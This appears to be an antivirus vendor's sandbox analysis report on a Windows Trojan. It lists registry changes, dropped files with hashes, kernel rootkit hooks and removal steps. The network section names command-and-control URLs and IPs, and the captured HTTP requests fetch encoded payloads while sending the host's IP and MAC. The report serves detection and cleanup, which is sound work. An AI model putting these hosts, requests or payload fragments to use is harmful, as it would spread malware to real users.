The process lgsoyx.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\Ymb\sys32\urlnav.dll"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"
[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"
[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"
[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 21 DB A2 3F 50 0E C8 7F DF 1E 7E 79 39 36 07"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\Ymb\sys32\urlnav.dll"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\Ymb\sys32\"
The process shock.exe:3848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC D9 84 84 31 6F 5C 02 36 47 10 EF 6D 97 A1 DC"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\TypeLib]
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"
[HKCR\Urladv.Adv\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Urladv.Adv]
"(Default)" = "Adv Class"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\TypeLib]
"Version" = "1.0"
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}]
"(Default)" = "IAdv"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0]
"(Default)" = "urladv 1.0 Type Library"
[HKCR\Urladv.Adv\CurVer]
"(Default)" = "Urladv.Adv.1"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\VersionIndependentProgID]
"(Default)" = "Urladv.Adv"
[HKCR\Urladv.Adv.1]
"(Default)" = "Adv Class"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}]
"(Default)" = "Adv Class"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\0\win32]
"(Default)" = "%WinDir%\Ymb\sys32\shock.dll"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"(Default)" = "%WinDir%\Ymb\sys32\shock.dll"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\ProgID]
"(Default)" = "Urladv.Adv.1"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urladv.Adv.1\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\HELPDIR]
"(Default)" = "%WinDir%\Ymb\sys32\"
Dropped PE files
MD5 | File path |
---|---|
55a3259a59e3c8da70c31447ba869226 | c:\WINDOWS\Ymb\deskico\desk.exe |
aa6a8b0804c64d9a744478aba1812bf3 | c:\WINDOWS\Ymb\lgsoyx.exe |
a9e6210e1512d80655643408876f5d7c | c:\WINDOWS\Ymb\sys32\shock.dll |
e894852596c57675446919411d8fc600 | c:\WINDOWS\Ymb\sys32\shock.exe |
9d7623b9a5040adb22ce80f31561ee9a | c:\WINDOWS\Ymb\sys32\urlnav.dll |
52b42aa6637c5e7e7a1fa38d8ad3147e | c:\WINDOWS\jwxf\MainPro.exe |
dde8a18d882ec61bffba5ce09fd3ede8 | c:\WINDOWS\jwxf\MainProX.exe |
99c87fbd1328657083180cc0a1c01d01 | c:\WINDOWS\jwxf\yp.exe |
4540f263d05608dcd3eb0affc059bac5 | c:\WINDOWS\system32\drivers\HideSys.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks:
ZwOpenProcess
ZwQuerySystemInformation
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nvsvc32.exe:2604
MainPro.exe:604
desk.exe:3840
ndis500.exe:2464
ping.exe:496
ping.exe:1388
YP.exe:1236
ndsqp.exe:2428
%original file name%.exe:1532
lgsoyx.exe:3824
shock.exe:3848
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\clk.ini (82 bytes)
%WinDir%\run.bat (196 bytes)
%WinDir%\c4ud.dll (1753 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\190[1].ico (5930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\178[1].ico (3595 bytes)
%WinDir%\Ymb\deskico\cfg.ini (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\184[1].ico (6341 bytes)
%Documents and Settings%\%current user%\Desktop\»ð±¬ÓÎ÷.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\棋牌大厅.lnk (1 bytes)
%WinDir%\Ymb\deskico\184.ico (5882 bytes)
%WinDir%\Ymb\deskico\178.ico (2390 bytes)
%Documents and Settings%\%current user%\Desktop\´«Ææ°Ãâ€ÂÒµ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\cfg[1].ini (275 bytes)
%WinDir%\Ymb\deskico\190.ico (5882 bytes)
%System%\drivers\uniconfi.dat (4447 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (491 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (180 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)
%WinDir%\Ymb\sys32\shock.exe (1493 bytes)
%System%\tl.dat (8 bytes)
%System%\bc.dat (1784 bytes)
%System%\tl.txt (388 bytes)
%System%\safe.dat (3780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hfftcbc.txt (601 bytes)
%WinDir%\Ymb\sys32\shock.txt (36452 bytes)
%WinDir%\Ymb\sys32\ndis500.txt (43108 bytes)
%WinDir%\Ymb\sys32\tray.txt (144098 bytes)
%WinDir%\Ymb\wow64\nvsvc32.txt (132327 bytes)
%WinDir%\Ymb\wow64\nvsvc32.exe (7715 bytes)
%WinDir%\Ymb\sys32\ndis500.exe (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcnpoku.txt (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\suqpotb.txt (2321 bytes)
%System%\bc.txt (85868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qxoxvnm.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ognbetd.txt (7345 bytes)
%WinDir%\Ymb\sys32\ndsqp.exe (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sgotxct.txt (7547 bytes)
%WinDir%\Ymb\sys32\urlnav.txt (14076 bytes)
%WinDir%\Ymb\First.txt (18796 bytes)
%WinDir%\Ymb\sys32\ndsqp.txt (12588 bytes)
%WinDir%\Ymb\sys32\urlnav.dll (83 bytes)
%WinDir%\Ymb\lgsoyx.exe (110 bytes)
%WinDir%\Ymb\deskico\desk.exe (299 bytes)
%WinDir%\Ymb\deskico\desk.txt (50796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mopdaqf.txt (4545 bytes)
%System%\safe.txt (122772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmifumt.txt (2105 bytes)
%WinDir%\Ymb\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gktmoij.txt (11 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (63836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wohbhrb.txt (673 bytes)
%WinDir%\jwxf\start.bat (99 bytes)
%WinDir%\jwxf\yp.exe (5033 bytes)
%WinDir%\jwxf\MainProX.exe (1660 bytes)
%WinDir%\jwxf\userip.ipb (936 bytes)
%WinDir%\jwxf\MainPro.exe (18513 bytes)
%WinDir%\Ymb\sys32\shock.dll (931 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 152808 | 153088 | 4.64164 | 22ced87f8cfbeec19f10ea768b9f5033 |
.rdata | 159744 | 20275 | 20480 | 3.68225 | 9aea8072fe8459f1fb075382c5799ef0 |
.data | 180224 | 136672 | 5120 | 1.76573 | 5aafebbc10957e661762e0e7fadc057b |
.rsrc | 319488 | 22204 | 22528 | 3.49153 | 0262b31b1b6e8cd4bbbefdfbece199d6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://116.255.243.151/plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930 | |
hxxp://saichi.chinacloudapp.cn/txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9 | |
hxxp://saichi.chinacloudapp.cn/txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1 | |
hxxp://saichi.chinacloudapp.cn/txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793 | |
hxxp://saichi.chinacloudapp.cn/txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905 | |
hxxp://saichi.chinacloudapp.cn/txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 | |
hxxp://saichi.chinacloudapp.cn/txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 | |
hxxp://saichi.chinacloudapp.cn/txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675 | |
hxxp://saichi.chinacloudapp.cn/txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7 | |
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/cfg.ini | |
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/178.ico | |
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/190.ico | |
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/184.ico | |
hxxp://saichi.chinacloudapp.cn/txt/list666_20150402170229.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=D4C0145555BF9ACCC927AF2650770FED | |
hxxp://log.soomeng.com/deskcount?31252A4A412B46731A5D48327378652739263A700E590D0C4B0822 | 115.238.251.56 |
hxxp://sc.p2ptool.com/txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9 | 42.159.29.153 |
hxxp://plus.zzinfor.cn/plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930 | |
hxxp://sc.p2ptool.com/txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 | 42.159.29.153 |
hxxp://pro.52icafe.com/desk/ico/178.ico | 61.240.135.44 |
hxxp://pro.52icafe.com/desk/ico/184.ico | 61.240.135.44 |
hxxp://sc.p2ptool.com/txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793 | 42.159.29.153 |
hxxp://sc.p2ptool.com/txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905 | 42.159.29.153 |
hxxp://sc.p2ptool.com/txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 | 42.159.29.153 |
hxxp://sc.p2ptool.com/txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7 | 42.159.29.153 |
hxxp://pro.52icafe.com/desk/ico/190.ico | 61.240.135.44 |
hxxp://pro.52icafe.com/desk/cfg.ini | 61.240.135.44 |
hxxp://sc.p2ptool.com/txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1 | 42.159.29.153 |
hxxp://sc.p2ptool.com/txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675 | 42.159.29.153 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:21 GMT
Content-Type: text/plain
Content-Length: 1446584
Last-Modified: Thu, 19 Mar 2015 08:35:59 GMT
Connection: close
ETag: "550a8a6f-1612b8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsE8FbgoIUwpwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnKkLylKYwrte9DsLM5FucPllBqI zLItKvUi7rq2FCBqFsOxkH2MqfSv749hq2FwRlndZ00VMyWqzJ/xxHG3la/wJfU2d3xaCkTmuEeFluFMl7A zf9Ag4606gmB7izB9dFky/01vE3mMTazQ2ZSPlrxNrNDZlI Wvl VctcLkkfUPVr1iHDbW5jPiHcrQA6UXLJiZU1pmi12TbqVDGLavoOy6LkFdeCINdwTSf310bhZcnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbXY6hqdQ2cLLUY8yWnM/JlTrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a1nmUDjllD1akaHXA5ON2pzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsK hEEjcLC6cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtP/iDIiRP218TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvLL1A4u6E4zsbEYRbm5uwDsTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9YGRwYXr/5B62mAps5IXtyfE2s0NmUj5a qSnCa1jASD9aoTtByytZbx9M823IT9dsbPFnfe4DzTxNrNDZlI WtwtiPSWquUIj9Gncu4pZZY04U68xaDharxMH0Rg6RlqsTazQ2ZSPlr6pKcJrWMBIPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a2wNi2SICdTxt5q/7FrJX T02MilBFZI5BN89H8kzdMM1wg5aryKKMjyVskrcu QLv2/X5A7iWtC0A4 WNkI2rvOjgcZEb9rUpV5CCcbiObIiZ/ISzb LW24uVO0eYtw3wnDtqlaMSXs8lbJK3LvkC4dUkaCFQH4uGom3ouwhi4W
<<< skipped >>>
GET /txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:26 GMT
Content-Type: text/plain
Content-Length: 147468
Last-Modified: Fri, 26 Sep 2014 08:07:24 GMT
Connection: close
ETag: "54251ebc-2400c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WuxZiU159BpcAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnIS6yH f1P2yDT7rluBqW2giD4y5yvaIirLOkqQZXa MIbx7i/hpcIaf85gpuidXx1b3p9sFPCdGlfauukL8n3VGGCFZN cmJD9zwQCS9bOJYls9jJp/ca4xNrNDZlI Wvl VctcLkkfUViPPzwwZ7PfTmgOKU172htBHTdk3n91KXxuX TIDozHopeYPJWsYu/iFay305SFOdOmlvW lRm5vx/GiWkbKnm/H8aJaRsqZvlZXSZdb4BrY LTgBilBfrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a81Tto86JwVL 37qBdmeggXE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvxbsYtAnHS18TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvtkRGcCbGyejNisBIg3iBXMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9WHnXYPNQ7BgK4Gpapi2s/vE2s0NmUj5a qSnCa1jASD9aoTtByytZZN3m8TegecH/B8RyOgTUFbxNrNDZlI WtwtiPSWquUIj9Gncu4pZZYMEiIQPXrL yZ4gEzkJ3TOMTazQ2ZSPlr6pKcJrWMBIPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>
GET /txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:17 GMT
Content-Type: text/plain
Content-Length: 284000
Last-Modified: Thu, 08 Jan 2015 06:22:57 GMT
Connection: close
ETag: "54ae2241-45560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJZdg29 aaSq5ChwQAReXuq73zZ03xNr0ykJLRLxHX2w 1JsVwVN93iCWjRKtF1lC0OB91q5UCVkX CgSF0zvN CGW9lWuWh/s//zc/3tOzL6RL5Mbk/NQRxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrueKHSyn HxLBeFOtBcslY/dg0 sDpLF93RaUFkAfs63G0OsoI1dTxYLcfzHzT/d51tXZUFbwHFGXJyfQNpBOtYm ARi1SoBtib4BGLVKgG0DV4qTUdhfmSJDFWoq8VaT6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WtslujPm19qT 7ANpY7NNxGxNrNDZlI WvE2s0NmUj5axVTR1yl7Wh4SFW6pDBLFWHE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WuoW8230dz3CcTazQ2ZSPlrITDcdtcg4PHE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr2ZKM DeF7JAizyarcgVRXzE2s0NmUj5azE4dSQE6hF3aV6mEpZjZPVJ0zS6tvj8Khj ky0f66t xNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWx KJjsrllxMXn TkM1wXQMTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWPTHC32lP2yiKbSD/GqSfVrE2s0NmUj5a qSnCa1jASD 8BgGQTR5rWsfHQ1j7MMGpL7AhrIhxwHxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a1g1uStZN/tZN8nvh42yy5zjYtpOb0ddkzy3MsKhIRqCv1dWtL7KUyRvBdNzQhkZ7g7ZxcD0GQdewD7gnpXgKvkcIPWgIAauLrgYRRnGkYGm/h49sgBiteO8 8Qf/c67uqcUL5XFlPi54GkU/tZooNm/Wfunt1CXI/N0o1JV7j/O
<<< skipped >>>
GET /txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:21 GMT
Content-Type: text/plain
Content-Length: 111288
Last-Modified: Fri, 14 Nov 2014 03:29:19 GMT
Connection: close
ETag: "5465770f-1b2b8"
